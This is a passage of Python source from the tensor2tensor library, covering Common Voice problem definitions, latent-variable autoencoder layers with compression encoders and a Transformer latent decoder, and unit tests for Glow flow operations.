class CommonVoiceClean(CommonVoice):
"""Problem spec for Common Voice using clean train and clean eval data."""
# Select only the "clean" data (crowdsourced quality control).
TRAIN_DATASETS = _COMMONVOICE_TRAIN_DATASETS[:1]
DEV_DATASETS = _COMMONVOICE_DEV_DATASETS[:1]
TEST_DATASETS = _COMMONVOICE_TEST_DATASETS[:1]
@registry.register_problem()
class CommonVoiceNoisy(CommonVoice):
"""Problem spec for Common Voice using noisy train and noisy eval data."""
# Select only the "other" data.
TRAIN_DATASETS = _COMMONVOICE_TRAIN_DATASETS[1:]
DEV_DATASETS = _COMMONVOICE_DEV_DATASETS[1:]
TEST_DATASETS = _COMMONVOICE_TEST_DATASETS[1:]
def set_common_voice_length_hparams(hparams):
hparams.max_length = 1650 * 80
hparams.max_input_seq_length = 1650
hparams.max_target_seq_length = 350
return hparams
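# Hedged usage sketch (not in the original file): applying the length overrides
# above to a base Transformer hparams set. The base-hparams factory used here
# is an assumption about how callers typically obtain hparams.
def _example_length_hparams():
  from tensor2tensor.models import transformer  # assumed importable
  hparams = transformer.transformer_base()
  return set_common_voice_length_hparams(hparams)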
```
#### File: tensor2tensor/layers/latent_layers.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import range # pylint: disable=redefined-builtin
from tensor2tensor.layers import common_attention
from tensor2tensor.layers import common_image_attention as cia
from tensor2tensor.layers import common_layers
from tensor2tensor.models import transformer
from tensor2tensor.utils import beam_search
import tensorflow as tf
DO_SUMMARIES = True
def compress_self_attention_layer(x, hparams, name=None):
"""Attend function."""
with tf.variable_scope(name, default_name="compress_self_attention"):
x, xshape, _ = cia.maybe_reshape_4d_to_3d(x)
y = common_attention.multihead_attention(
common_layers.layer_preprocess(x, hparams),
None,
None,
hparams.attention_key_channels or hparams.hidden_size,
hparams.attention_value_channels or hparams.hidden_size,
hparams.hidden_size, hparams.num_heads,
hparams.attention_dropout)
res = common_layers.layer_postprocess(x, y, hparams)
return tf.reshape(res, xshape)
def compute_nats_and_bits_per_dim(data_dim,
latent_dim,
average_reconstruction,
average_prior):
"""Computes negative ELBO, which is an upper bound on the negative likelihood.
Args:
data_dim: int-like indicating data dimensionality.
latent_dim: int-like indicating latent dimensionality.
average_reconstruction: Scalar Tensor indicating the reconstruction cost
averaged over all data dimensions and any data batches.
average_prior: Scalar Tensor indicating the negative log-prior probability
averaged over all latent dimensions and any data batches.
Returns:
Tuple of scalar Tensors, representing the nats and bits per data dimension
(e.g., subpixels) respectively.
"""
with tf.name_scope(None, default_name="compute_nats_per_dim"):
data_dim = tf.cast(data_dim, average_reconstruction.dtype)
latent_dim = tf.cast(latent_dim, average_prior.dtype)
negative_log_likelihood = data_dim * average_reconstruction
negative_log_prior = latent_dim * average_prior
negative_elbo = negative_log_likelihood + negative_log_prior
nats_per_dim = tf.divide(negative_elbo, data_dim, name="nats_per_dim")
bits_per_dim = tf.divide(nats_per_dim, tf.log(2.), name="bits_per_dim")
return nats_per_dim, bits_per_dim
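# Hedged sanity-check sketch (not in the original module): the same
# nats -> bits-per-dim arithmetic with plain Python floats. The dimensions and
# average costs below are assumed example values, not real measurements.
def _example_bits_per_dim():
  import math
  data_dim, latent_dim = 32.0 * 32.0 * 3.0, 64.0    # e.g. a 32x32x3 image
  avg_reconstruction, avg_prior = 2.1, 3.5          # assumed averages, in nats
  negative_elbo = data_dim * avg_reconstruction + latent_dim * avg_prior
  nats_per_dim = negative_elbo / data_dim
  bits_per_dim = nats_per_dim / math.log(2.)
  return nats_per_dim, bits_per_dim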
def multinomial_sample(x, vocab_size=None, sampling_method="random",
temperature=1.0):
"""Multinomial sampling from a n-dimensional tensor.
Args:
x: Tensor of shape [..., vocab_size]. Parameterizes logits of multinomial.
vocab_size: Number of classes in multinomial distribution.
sampling_method: String, "random" or otherwise deterministic.
temperature: Positive float.
Returns:
Tensor of shape [...].
"""
vocab_size = vocab_size or common_layers.shape_list(x)[-1]
if sampling_method == "random" and temperature > 0.0:
samples = tf.multinomial(tf.reshape(x, [-1, vocab_size]) / temperature, 1)
else:
samples = tf.argmax(x, axis=-1)
reshaped_samples = tf.reshape(samples, common_layers.shape_list(x)[:-1])
return reshaped_samples
def ae_latent_softmax(latents_pred, latents_discrete_hot, vocab_size, hparams):
"""Latent prediction and loss.
Args:
latents_pred: Tensor of shape [..., depth].
latents_discrete_hot: Tensor of shape [..., vocab_size].
vocab_size: an int representing the vocab size.
hparams: tf.contrib.training.HParams.
Returns:
sample: Tensor of shape [...], a sample from a multinomial distribution.
loss: Tensor of shape [...], the softmax cross-entropy.
"""
with tf.variable_scope("latent_logits"):
latents_logits = tf.layers.dense(latents_pred, vocab_size,
name="logits_dense")
if hparams.logit_normalization:
latents_logits *= tf.rsqrt(1e-8 +
tf.reduce_mean(tf.square(latents_logits)))
loss = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=latents_discrete_hot, logits=latents_logits)
# TODO(trandustin): tease this out from ae_latent_softmax.
# we use just the loss portion to anchor prior / encoder on text.
sample = multinomial_sample(latents_logits,
vocab_size,
hparams.sampling_method,
hparams.sampling_temp)
return sample, loss
def ae_latent_sample_beam(latents_dense_in, inputs, ed, embed, hparams):
"""Samples from the latent space in the autoencoder.
Args:
latents_dense_in: Tensor of shape [batch, length_q, ...]. Only the shape of
its first two dimensions are used. length_q is the latent length, which is
height * width * hparams.num_latents / (2**hparams.num_compress_steps).
inputs: Tensor of shape [batch, length_kv, hparams.hidden_size]. Encodings
to attend to in decoder.
ed: Tensor which broadcasts with shape [batch, hparams.num_heads, length_q,
length_kv]. Encoder-decoder attention bias.
embed: Callable which embeds discrete latent hot-vectors and a hidden size
and returns dense vectors.
hparams: tf.contrib.training.HParams.
Returns:
Tensor of shape [batch, length].
"""
def symbols_to_logits_fn(ids):
"""Go from ids to logits."""
ids = tf.expand_dims(ids, axis=2) # Ids start with added all-zeros.
latents_discrete = tf.pad(ids[:, 1:], [[0, 0], [0, 1], [0, 0]])
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
latents_dense = embed(
tf.one_hot(latents_discrete, depth=2**hparams.bottleneck_bits),
hparams.hidden_size)
latents_pred = transformer_latent_decoder(
latents_dense, inputs, ed, hparams, name="latent_prediction")
logits = tf.layers.dense(
latents_pred, 2**hparams.bottleneck_bits, name="logits_dense")
current_output_position = common_layers.shape_list(ids)[1] - 1
logits = logits[:, current_output_position, :]
return logits
initial_ids = tf.zeros([tf.shape(latents_dense_in)[0]], dtype=tf.int32)
length = tf.shape(latents_dense_in)[1]
ids, _ = beam_search.beam_search(
symbols_to_logits_fn,
initial_ids,
1,
length,
2**hparams.bottleneck_bits,
alpha=0.0,
eos_id=-1,
stop_early=False)
res = tf.expand_dims(ids[:, 0, :], axis=2) # Pick first beam.
return res[:, 1:] # Remove the added all-zeros from ids.
def residual_block_layer(inputs, hparams):
"""Residual block over inputs.
Runs a residual block consisting of
conv: kernel_size x kernel_size
conv: 1x1
dropout, add and normalize according to hparams.layer_postprocess_sequence.
Args:
inputs: Tensor of shape [batch, height, width, hparams.hidden_size].
hparams: tf.contrib.training.HParams.
Returns:
Tensor of shape [batch, height, width, hparams.hidden_size].
"""
kernel = (hparams.res_kernel_size, hparams.res_kernel_size)
x = inputs
for i in range(hparams.num_res_layers):
with tf.variable_scope("res_conv_%d" % i):
# kernel_size x kernel_size conv block
y = common_layers.conv_block(
common_layers.layer_norm(x, hparams.hidden_size, name="lnorm"),
hparams.hidden_size, [((1, 1), kernel)],
strides=(1, 1),
padding="SAME",
name="residual_conv")
# 1x1 conv block
y = common_layers.conv_block(
y,
hparams.hidden_size, [((1, 1), (1, 1))],
strides=(1, 1),
padding="SAME",
name="residual_dense")
x = common_layers.layer_postprocess(x, y, hparams)
return x
def compress_encoder(inputs,
hparams,
strides=(2, 2),
kernel_size=(3, 3),
name=None):
"""Encoder that compresses 2-D inputs by 2**num_compress_steps.
Args:
inputs: Tensor of shape [batch, height, width, channels].
hparams: tf.contrib.training.HParams.
strides: Tuple, strides for conv block.
kernel_size: Tuple, kernel window size for conv block.
name: string, variable scope.
Returns:
Tensor of shape [batch, latent_length, hparams.hidden_size], where
latent_length is
hparams.num_latents * (height*width) / 2**(hparams.num_compress_steps).
"""
with tf.variable_scope(name, default_name="compress"):
x = inputs
for i in range(hparams.num_compress_steps // 2):
with tf.variable_scope("compress_conv_%d" % i):
y = common_layers.conv_block(
common_layers.layer_norm(
x, hparams.hidden_size, name="lnorm"),
hparams.hidden_size,
dilation_rates_and_kernel_sizes=[((1, 1), kernel_size)],
strides=strides,
padding="SAME",
name="compress_conv_%d" % i)
y = tf.nn.dropout(y, 1.0 - hparams.dropout)
if hparams.do_compress_attend:
y = compress_self_attention_layer(
x, hparams, name="compress_selfatt_%d" % i)
y += x
x = y
x = residual_block_layer(x, hparams)
# If using multiple copies of latents, blow up the hidden size and then
# reshape to increase by num_latents.
shape_x = common_layers.shape_list(x)
x = tf.layers.dense(x,
hparams.num_latents * hparams.hidden_size,
name=name + "_dense")
return tf.reshape(x, [shape_x[0],
shape_x[1] * shape_x[2] * hparams.num_latents,
hparams.hidden_size])
def compress_encoder_2d(x, hparams, name=None):
"""Encoder that compresses 2-D inputs by 2**num_compress_steps.
Args:
x: Tensor of shape [batch, height, width, channels].
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, latent_length, hparams.hidden_size], where
latent_length is
hparams.num_latents * (height*width) / 2**(hparams.num_compress_steps).
"""
return compress_encoder(
x,
hparams,
strides=(2, 2),
kernel_size=(hparams.kernel_size, hparams.kernel_size),
name=name)
def compress_encoder_1d(x, hparams, name=None):
"""Encoder that compresses 1-D inputs by 2**num_compress_steps.
Args:
x: Tensor of shape [batch, length, channels].
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, latent_length, hparams.hidden_size], where
latent_length is
hparams.num_latents * length / 2**hparams.num_compress_steps.
"""
x = tf.expand_dims(x, axis=2)
return compress_encoder(x,
hparams,
strides=(2, 1),
kernel_size=(hparams.kernel_size, 1),
name=name)
def decompress_decoder(inputs,
hparams,
strides=(2, 2),
kernel=(3, 3),
name=None):
"""Decoder that decompresses 2-D inputs by 2**num_compress_steps.
Args:
inputs: Tensor of shape [batch, compress_height, compress_width, channels].
hparams: tf.contrib.training.HParams.
strides: Tuple, strides for conv block.
kernel: Tuple, kernel window size for conv block.
name: string, variable scope.
Returns:
Tensor of shape [batch, height, width, hparams.hidden_size].
"""
with tf.variable_scope(name, default_name="decompress"):
x = inputs
x = tf.layers.dense(x, hparams.hidden_size, name=name + "_dense")
x = residual_block_layer(x, hparams)
for i in range(hparams.num_compress_steps // 2):
j = hparams.num_compress_steps // 2 - i - 1
with tf.variable_scope(name + "_%d" % j):
if hparams.do_decompress_attend:
y = compress_self_attention_layer(
x, hparams, name="decompress_selfatt")
x += y
y = tf.layers.conv2d_transpose(
x,
hparams.hidden_size,
kernel,
strides=strides,
padding="SAME",
activation=tf.nn.relu if i > 0 else None,
name="decompress_conv")
x = y
return x
def decompress_decoder_2d(x, hparams, name=None):
"""Decoder that decompresses 2-D inputs by 2**num_compress_steps.
Args:
x: Tensor of shape [batch, compress_height, compress_width, channels].
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, height, width, hparams.hidden_size].
"""
return decompress_decoder(x, hparams,
strides=(2, 2),
kernel=(hparams.kernel_size, hparams.kernel_size),
name=name)
def decompress_decoder_1d(x, hparams, name=None):
"""Decoder that decompresses 1-D inputs by 2**num_compress_steps.
Args:
x: Tensor of shape [batch, compress_length, channels].
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, length, hparams.hidden_size].
"""
x = tf.expand_dims(x, axis=2)
output = decompress_decoder(x, hparams,
strides=(2, 1),
kernel=(hparams.kernel_size, 1),
name=name)
return tf.squeeze(output, axis=2)
def transformer_text_encoder(inputs,
target_space,
hparams,
name=None):
"""Transformer text encoder over inputs with unmasked full attention.
Args:
inputs: Tensor of shape [batch, length, 1, hparams.hidden_size].
target_space: int. Used for encoding inputs under a target space id.
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
encoder_output: Tensor of shape [batch, length, hparams.hidden_size].
ed: Tensor of shape [batch, 1, 1, length]. Encoder-decoder attention bias
for any padded tokens.
"""
with tf.variable_scope(name, default_name="transformer_text_encoder"):
inputs = common_layers.flatten4d3d(inputs)
[
encoder_input,
encoder_self_attention_bias,
ed,
] = transformer.transformer_prepare_encoder(inputs,
target_space=target_space,
hparams=hparams)
encoder_input = tf.nn.dropout(encoder_input, 1.0 - hparams.dropout)
encoder_output = transformer.transformer_encoder(
encoder_input, encoder_self_attention_bias, hparams)
return encoder_output, ed
def transformer_image_decoder(targets,
encoder_output,
ed_attention_bias,
hparams,
name=None):
"""Transformer image decoder over targets with local attention.
Args:
targets: Tensor of shape [batch, ...], and whose size is batch * height *
width * hparams.num_channels * hparams.hidden_size.
encoder_output: Tensor of shape [batch, length_kv, hparams.hidden_size].
ed_attention_bias: Tensor which broadcasts with shape [batch,
hparams.num_heads, length_q, length_kv]. Encoder-decoder attention bias.
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, height, width * hparams.num_channels,
hparams.hidden_size].
"""
with tf.variable_scope(name, default_name="transformer_dec"):
batch_size = common_layers.shape_list(targets)[0]
targets = tf.reshape(targets, [batch_size,
hparams.img_len,
hparams.img_len,
hparams.num_channels * hparams.hidden_size])
decoder_input, _, _ = cia.prepare_decoder(targets, hparams)
decoder_output = cia.transformer_decoder_layers(
decoder_input,
encoder_output,
hparams.num_decoder_layers or hparams.num_hidden_layers,
hparams,
attention_type=hparams.dec_attention_type,
encoder_decoder_attention_bias=ed_attention_bias,
name="decoder")
decoder_output = tf.reshape(decoder_output,
[batch_size,
hparams.img_len,
hparams.img_len * hparams.num_channels,
hparams.hidden_size])
return decoder_output
def transformer_latent_decoder(x,
encoder_output,
ed_attention_bias,
hparams,
name=None):
"""Transformer decoder over latents using latent_attention_type.
Args:
x: Tensor of shape [batch, length_q, hparams.hidden_size]. length_q is the
latent length, which is
height * width * hparams.num_latents / (2**hparams.num_compress_steps).
encoder_output: Tensor of shape [batch, length_kv, hparams.hidden_size].
ed_attention_bias: Tensor which broadcasts with shape [batch,
hparams.num_heads, length_q, length_kv]. Encoder-decoder attention bias.
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, length_q, hparams.hidden_size].
"""
with tf.variable_scope(name, default_name="transformer_latent_dec"):
batch_size = common_layers.shape_list(x)[0]
compressed_img_len = (hparams.img_len //
2**(hparams.num_compress_steps // 2))
x = tf.reshape(x, [batch_size,
compressed_img_len,
compressed_img_len * hparams.num_latents,
hparams.hidden_size])
decoder_input, _, _ = cia.prepare_decoder(x, hparams)
decoder_output = cia.transformer_decoder_layers(
decoder_input,
encoder_output,
hparams.num_latent_layers or hparams.num_hidden_layers,
hparams,
attention_type=hparams.latent_attention_type,
encoder_decoder_attention_bias=ed_attention_bias,
name="decoder")
decoder_output = tf.reshape(decoder_output,
[batch_size,
compressed_img_len**2 * hparams.num_latents,
hparams.hidden_size])
return decoder_output
def bottleneck_layer(inputs,
hparams,
name="discrete_bottleneck"):
"""Computes latents given inputs (typically, compressed targets)."""
[
latents_dense,
latents_discrete,
extra_loss,
embed_fn,
_,
] = hparams.bottleneck(inputs=inputs,
filter_size=hparams.compress_filter_size,
name=name,
mode=hparams.mode)
if DO_SUMMARIES:
tf.summary.histogram("discrete_latents",
tf.reshape(latents_discrete, [-1]))
return latents_dense, latents_discrete, extra_loss, embed_fn
def latent_prediction_model(inputs,
ed_attention_bias,
latents_discrete,
latents_dense,
hparams,
vocab_size=None,
name=None):
"""Transformer-based latent prediction model.
It is an autoregressive decoder over latents_discrete given inputs.
Args:
inputs: Tensor of shape [batch, length_kv, hparams.hidden_size]. Inputs to
attend to for the decoder on latents.
ed_attention_bias: Tensor which broadcasts with shape [batch,
hparams.num_heads, length_q, length_kv]. Encoder-decoder attention bias.
latents_discrete: Tensor of shape [batch, length_q, vocab_size].
One-hot latents to compute log-probability of given inputs.
latents_dense: Tensor of shape [batch, length_q, hparams.hidden_size].
length_q is the latent length, which is
height * width * hparams.num_latents / (2**hparams.num_compress_steps).
hparams: tf.contrib.training.HParams.
vocab_size: int or None. If None, it is 2**hparams.bottleneck_bits.
name: string, variable scope.
Returns:
latents_pred: Tensor of shape [batch, length_q, hparams.hidden_size].
latents_pred_loss: Tensor of shape [batch, length_q].
"""
with tf.variable_scope(name, default_name="latent_prediction"):
if hparams.mode != tf.estimator.ModeKeys.PREDICT:
latents_pred = transformer_latent_decoder(tf.stop_gradient(latents_dense),
inputs,
ed_attention_bias,
hparams,
name)
if vocab_size is None:
vocab_size = 2**hparams.bottleneck_bits
if not hparams.soft_em:
# TODO(trandustin): latents_discrete is not one-hot from
# discrete_bottleneck unless hparams.soft_em is True. Refactor.
latents_discrete = tf.one_hot(latents_discrete, depth=vocab_size)
_, latent_pred_loss = ae_latent_softmax(
latents_pred, tf.stop_gradient(latents_discrete), vocab_size, hparams)
return latents_pred, latent_pred_loss
def transformer_autoencoder(inputs,
targets,
target_space,
hparams,
cache=None,
predict_mask=1.0):
"""Auto-encoder using a Transformer decoder and a prior over latent sequences.
Args:
inputs: Tensor of shape [batch, length, 1, hparams.hidden_size] or None.
targets: Tensor of shape [batch, ..., channels]. Ellipses may be 1 or 2
dimensions denoting sequence length.
target_space: int. Used for encoding inputs under a target space id.
hparams: tf.contrib.training.HParams.
cache: Tensor of shape [batch, length] or None.
predict_mask: Tensor masking whether to use gold targets or predictions.
Returns:
decoder_output: Tensor of shape [batch, ..., hparams.hidden_size] presenting
pre-logit activations. After a transformation (`top` in `T2TModel`), it is
used with targets to compute the "training" (reconstruction) loss.
losses: dict of str to Tensors. There are three loss terms: "extra",
"extra_loss", and "latent_pred". The first is hard-coded to 0. The latter
two are Tensors of shape [batch].
cache: Tensor of shape [batch, length], either the same as cache, or newly
computed if the cache input is None.
"""
original_targets_shape = common_layers.shape_list(targets)
batch_size = original_targets_shape[0]
if len(original_targets_shape) == 4:
compress_fn = compress_encoder_2d
decompress_fn = decompress_decoder_2d
else:
compress_fn = compress_encoder_1d
decompress_fn = decompress_decoder_1d
ed_attention_bias = None
if inputs is not None:
inputs, ed_attention_bias = transformer_text_encoder(
inputs, target_space, hparams, name="input_encoder")
losses = {"extra": 0.,
"extra_loss": 0.,
"latent_pred": 0.}
if hparams.mode != tf.estimator.ModeKeys.PREDICT:
targets_compressed = compress_fn(targets, hparams, name="compress")
if hparams.mode == tf.estimator.ModeKeys.TRAIN:
scale = common_layers.inverse_exp_decay(hparams.startup_steps)
else:
scale = 1.0
scale = tf.to_float(tf.less(tf.random_uniform([batch_size]), scale))
latents_dense, latents_discrete, extra_loss, _ = bottleneck_layer(
targets_compressed, hparams)
extra_loss = scale * tf.reduce_mean(extra_loss)
_, latents_pred_loss = latent_prediction_model(
inputs, ed_attention_bias, latents_discrete, latents_dense, hparams,
name="latent_pred")
latent_time = tf.less(hparams.mask_startup_steps,
tf.to_int32(tf.train.get_global_step()))
latents_pred_loss = scale * tf.reduce_mean(latents_pred_loss)
latents_pred_loss *= tf.to_float(latent_time)
# Apply dropout noise for each data point and time step.
latents_dense_shape = common_layers.shape_list(latents_dense)
latents_dense = tf.nn.dropout(
latents_dense,
keep_prob=1 - hparams.latent_dropout,
noise_shape=[latents_dense_shape[0], latents_dense_shape[1], 1])
# TODO(trandustin): Can we combine extra and extra_loss?
losses = {"extra": 0.,
"extra_loss": extra_loss,
"latent_pred": latents_pred_loss}
else:
# Set the latent length, which is num_latents times the number of latent
# pixels. The number of latent pixels is determined by a compression factor
# on the number of image pixels.
latent_len = ((hparams.img_len * hparams.img_len * hparams.num_latents) /
(2**hparams.num_compress_steps))
_, _, _, embed_fn = bottleneck_layer(targets_compressed, hparams)
latents_dense = tf.zeros([batch_size, latent_len, 1, hparams.hidden_size])
if cache is None:
cache = ae_latent_sample_beam(latents_dense,
inputs,
ed_attention_bias,
embed_fn,
hparams)
cache_one_hot = tf.one_hot(cache, depth=2**hparams.bottleneck_bits)
latents_dense = embed_fn(cache_one_hot, hparams.hidden_size)
if len(original_targets_shape) == 4:
compressed_img_len = (hparams.img_len //
2**(hparams.num_compress_steps // 2))
latents_dense = tf.reshape(latents_dense,
[batch_size,
compressed_img_len,
compressed_img_len,
hparams.num_latents * hparams.hidden_size])
latents_dense = decompress_fn(latents_dense, hparams, name="decompress")
latents_dense = tf.reshape(
latents_dense,
[-1, hparams.img_len, hparams.img_len, hparams.hidden_size])
if hparams.use_gold_targets:
if hparams.mode == tf.estimator.ModeKeys.PREDICT:
masking = predict_mask
else:
masking = common_layers.inverse_exp_decay(hparams.mask_startup_steps)
targets, _, _ = cia.maybe_reshape_4d_to_3d(targets)
mask = tf.less(masking,
tf.random_uniform(common_layers.shape_list(targets)[:-1]))
mask = tf.expand_dims(tf.to_float(mask), 2)
latents_dense = mask * targets + (1.0 - mask) * latents_dense
latents_dense = tf.reshape(latents_dense, original_targets_shape)
if hparams.decode_autoregressive:
decoder_output = transformer_image_decoder(
latents_dense, inputs, ed_attention_bias, hparams, name="decoder")
else:
decoder_output = latents_dense
return decoder_output, losses, cache
def iaf_flow(one_hot_assignments,
scale_weights,
scale_bias,
num_codes,
summary=True,
name=None):
"""Performs a single IAF flow using scale and normalization transformations.
Args:
one_hot_assignments: Assignments Tensor with shape [num_samples, batch_size,
latent_size, num_codes].
scale_weights: Tensor corresponding to lower triangular matrix used to
autoregressively generate scale matrix from assignments. To ensure the
lower-triangular matrix has length of latent_size, scale_weights should
be a rank-one tensor with size latent_size * (latent_size + 1) / 2.
scale_bias: Bias tensor to be added to scale tensor, with shape
[latent_size, num_codes]. If scale weights are zero, initialize scale_bias
to be log(exp(1.) / 2. - 1) so initial transformation is identity.
num_codes: Number of codes in codebook.
summary: Whether to save summaries.
name: String used for name scope.
Returns:
flow_output: Transformed one-hot assignments.
inverse_log_det_jacobian: Inverse log deteriminant of Jacobian corresponding
to transformation.
"""
with tf.name_scope(name, default_name="iaf"):
# Pad the one_hot_assignments by zeroing out the first latent dimension and
# shifting the rest down by one (and removing the last dimension).
padded_assignments = tf.pad(
one_hot_assignments, [[0, 0], [0, 0], [1, 0], [0, 0]])[:, :, :-1, :]
scale_bijector = tf.contrib.distributions.bijectors.Affine(
scale_tril=tf.contrib.distributions.fill_triangular(scale_weights))
scale = scale_bijector.forward(
tf.transpose(padded_assignments, [0, 1, 3, 2]))
# Transpose the bijector output since it performs a batch matmul.
scale = tf.transpose(scale, [0, 1, 3, 2])
scale = tf.nn.softplus(scale)
scale = scale + tf.nn.softplus(scale_bias[tf.newaxis, tf.newaxis, ...])
# Don't need last dimension since the transformation keeps it constant.
scale = scale[..., :-1]
z = one_hot_assignments[..., :-1]
unnormalized_probs = tf.concat([z * scale,
one_hot_assignments[..., -1, tf.newaxis]],
axis=-1)
normalizer = tf.reduce_sum(unnormalized_probs, axis=-1)
flow_output = unnormalized_probs / (normalizer[..., tf.newaxis])
inverse_log_det_jacobian = (-tf.reduce_sum(tf.log(scale), axis=-1)
+ num_codes * tf.log(normalizer))
if summary:
tf.summary.histogram("iaf/scale", tf.reshape(scale, [-1]))
tf.summary.histogram("iaf/inverse_log_det_jacobian",
tf.reshape(inverse_log_det_jacobian, [-1]))
return flow_output, inverse_log_det_jacobian
```
#### File: models/research/glow_ops_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensor2tensor.models.research import glow
from tensor2tensor.models.research import glow_ops
import tensorflow as tf
arg_scope = tf.contrib.framework.arg_scope
add_arg_scope = tf.contrib.framework.add_arg_scope
class GlowOpsTest(tf.test.TestCase):
def test_get_variable_ddi(self):
with tf.Graph().as_default():
x_t = tf.random_normal((5, 5))
ddi = glow_ops.get_variable_ddi(
"x", (5, 5), initial_value=x_t, init=True)
with tf.Session() as session:
diff = ddi - x_t
self.assertTrue(np.allclose(session.run(diff), 0.0))
def test_actnorm(self):
"""Test that actnorm provides activations with zero channel-mean."""
with tf.Graph().as_default():
x_t = tf.random_normal((16, 32, 32, 3), mean=50.0, stddev=2.0)
x_act = glow_ops.actnorm("actnorm", x_t, init=True)
with tf.Session() as session:
x_act_np, _ = session.run(x_act)
channel_mean = np.mean(x_act_np, axis=(0, 1, 2))
channel_var = np.var(x_act_np, axis=(0, 1, 2))
self.assertTrue(np.allclose(channel_mean, 0.0, atol=1e-3))
self.assertTrue(np.allclose(channel_var, 1.0, atol=1e-3))
def check_invertibility(self, op, name):
with tf.Graph().as_default():
x = tf.random_uniform(shape=(16, 32, 32, 4))
x_inv, _ = op(name, x, reverse=False)
x_inv_inv, _ = op(name, x_inv, reverse=True)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
diff = session.run(x - x_inv_inv)
self.assertTrue(np.allclose(diff, 0.0, atol=1e-5))
def test_invertibility(self):
rev_ops = [glow_ops.invertible_1x1_conv, glow_ops.affine_coupling,
glow_ops.actnorm]
names = ["inv_1X1_conv", "affine_coupling", "actnorm"]
for rev_op, name in zip(rev_ops, names):
self.check_invertibility(rev_op, name)
def test_add_edge_bias(self):
with tf.Graph().as_default():
x = tf.random_uniform(shape=(16, 32, 32, 3))
x_pad = glow_ops.add_edge_bias(x, [3, 3])
with tf.Session() as session:
x_pad_np = session.run(x_pad)
# Test expected output shape.
self.assertEqual(x_pad_np.shape, (16, 34, 34, 4))
def test_conv2d(self):
with tf.Graph().as_default():
x = 10.0 * tf.random_uniform(shape=(16, 5, 5, 32))
with arg_scope([glow_ops.actnorm], init=True):
actnorm_conv2d = glow_ops.conv2d(
"actnorm_conv2d", x, output_channels=64, apply_actnorm=True)
actnorm_zeros2d = glow_ops.conv2d(
"actnorm_zeros2d", x, output_channels=64, apply_actnorm=False)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
# test if apply_actnorm is set to True, the first minibatch has
# zero mean and unit variance.
actnorm_np, zeros_np = session.run([actnorm_conv2d, actnorm_zeros2d])
self.assertEqual(actnorm_np.shape, (16, 5, 5, 64))
mean = np.mean(actnorm_np, axis=(0, 1, 2))
var = np.var(actnorm_np, axis=(0, 1, 2))
self.assertTrue(np.allclose(mean, 0.0, atol=1e-5))
self.assertTrue(np.allclose(var, 1.0, atol=1e-5))
# test shape in case apply_actnorm is set to False,
self.assertEqual(zeros_np.shape, (16, 5, 5, 64))
def test_affine_coupling_network(self):
"""Test output shape."""
with tf.Graph().as_default():
x = 10.0 * tf.random_uniform(shape=(16, 5, 5, 32))
nn = glow_ops.affine_coupling_network("nn", x, 512, 64)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
nn_np = session.run(nn)
self.assertEqual(nn_np.shape, (16, 5, 5, 64))
# Initialized with zeros.
self.assertTrue(np.allclose(nn_np, 0.0))
def check_tensor_to_dist(self, architecture):
with tf.Graph().as_default():
x = tf.random_uniform(shape=(16, 5, 5, 32))
x_prior = glow_ops.tensor_to_dist("split_prior", x,
architecture=architecture,
output_channels=64)
mean_t, scale_t = x_prior.loc, x_prior.scale
with tf.Session() as session:
session.run(tf.global_variables_initializer())
mean, scale = session.run([mean_t, scale_t])
self.assertEqual(mean.shape, (16, 5, 5, 64))
self.assertEqual(scale.shape, (16, 5, 5, 64))
self.assertTrue(np.allclose(mean, 0.0))
self.assertTrue(np.allclose(scale, 1.0))
def test_tensor_to_dist(self):
for architecture in ["single_conv", "glow_nn"]:
self.check_tensor_to_dist(architecture)
def test_split(self):
with tf.Graph().as_default():
x = tf.random_uniform(shape=(16, 5, 5, 32))
x_inv, _, eps, z, _ = glow_ops.split("split", x)
x_inv_inv, _, _ = glow_ops.split("split", x_inv, reverse=True, eps=eps)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
x_inv_np, diff, z_np = session.run([x_inv, x - x_inv_inv, z])
self.assertEqual(z_np.shape, (16, 5, 5, 16))
self.assertEqual(x_inv_np.shape, (16, 5, 5, 16))
self.assertTrue(np.allclose(diff, 0.0, atol=1e-5))
def check_revnet_reversibility(self, op, name):
with tf.Graph().as_default():
hparams = glow.glow_hparams()
hparams.depth = 2
x = tf.random_uniform(shape=(16, 32, 32, 4), seed=0)
x_inv, _ = op(name, x, hparams, reverse=False)
x_inv_inv, _ = op(name, x_inv, hparams, reverse=True)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
diff = session.run(x - x_inv_inv)
self.assertTrue(np.allclose(diff, 0.0, atol=1e-2))
def test_revnet_reversibility(self):
ops = [glow_ops.revnet_step, glow_ops.revnet]
names = ["revnet_step", "revnet"]
for op, name in zip(ops, names):
self.check_revnet_reversibility(op, name)
def test_encoder_decoder(self):
with tf.Graph().as_default():
hparams = glow.glow_hparams()
hparams.n_levels = 3
hparams.depth = 2
x = tf.random_uniform(shape=(16, 64, 64, 4), seed=0)
x_inv, _, eps, z_levels, _ = glow_ops.encoder_decoder(
"encoder_decoder", x, hparams, reverse=False)
x_inv_inv, _, z_inv_levels, _ = glow_ops.encoder_decoder(
"encoder_decoder", x_inv, hparams, eps=eps, reverse=True)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
diff, x_inv_np, z_levels_np, z_inv_levels_np = session.run(
[x - x_inv_inv, x_inv, z_levels, z_inv_levels])
self.assertEqual(len(z_levels_np), 2)
self.assertEqual(len(z_inv_levels_np), 2)
# (h_i, w_i, c_i) = (h_{i-1}/f, w_{i-1}/f, c_{i-1}*(2f)/2) where (f=2)
self.assertEqual(z_levels_np[0].shape, (16, 32, 32, 8))
self.assertEqual(z_levels_np[1].shape, (16, 16, 16, 16))
